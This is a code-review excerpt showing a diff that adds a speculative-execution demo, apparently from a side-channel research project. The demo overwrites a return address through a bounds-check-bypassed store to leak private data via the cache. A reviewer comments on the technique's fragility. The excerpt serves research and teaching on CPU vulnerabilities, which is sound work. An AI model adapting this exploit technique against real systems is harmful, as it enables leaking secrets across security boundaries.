demos/read_transient_writes.cc

```diff
@@ -0,0 +1,140 @@
+/*
+ * Copyright 2019 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *   https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <array>
+#include <cstring>
+#include <iostream>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+#include "local_content.h"
+#include "utils.h"
+
+constexpr static size_t kWriteBufferSize = 16;
+extern char hijackedcheck[];
+extern char aftercheck[];
+
+bool init = true;
+size_t colliding_offset;
+size_t current_offset;
+const std::array<BigByte, 256> *oracle_ptr;
+
+SAFESIDE_NEVER_INLINE
+static char InnerCall(size_t local_offset, size_t *size_in_heap) {
+  volatile size_t write_buffer [kWriteBufferSize];
+  // On the beginning we precompute the offset of the return address.
+  if (init) {
+    volatile size_t *write_buffer_copy = write_buffer;
+    for (int i = kWriteBufferSize;; ++i) {
+      if (write_buffer_copy[i] == reinterpret_cast<size_t>(aftercheck)) {
+        colliding_offset = i;
+        break;
+      }
+    }
+    init = false;
+  }
+
+  // Bounds-check store bypass. When the local offset contains the colliding
+  // offset, it rewrites the return address.
+  if (local_offset < *size_in_heap) {
+    write_buffer[local_offset] = reinterpret_cast<size_t>(hijackedcheck);
+  }
+
+  // In LeakByte the return value is ignored.
+  return private_data[current_offset];
+}
+
+// Gadget function. Never called architecturally.
+static void GadgetHelper() {
+  std::cout << "Dead code. Must never be reached." << std::endl;
+  if (strlen(public_data) == 0) {
+    exit(EXIT_FAILURE);
+  }
+  // Fake call.
+  char value = InnerCall(0, 0);
```

Comment:
Again, a good place to be more explicit: by overwriting the return address in `InnerCall`, we _invent_ a return to this position, where the compiler then ends up using the return value in `eax` in code that would not otherwise be executed.

This does strike me as really fragile -- for example, it seems like the compiler would be within its rights to move the return value into a different register as part of compiling the assignment `value = InnerCall()` -- but I guess we know if it breaks when this leak stops working.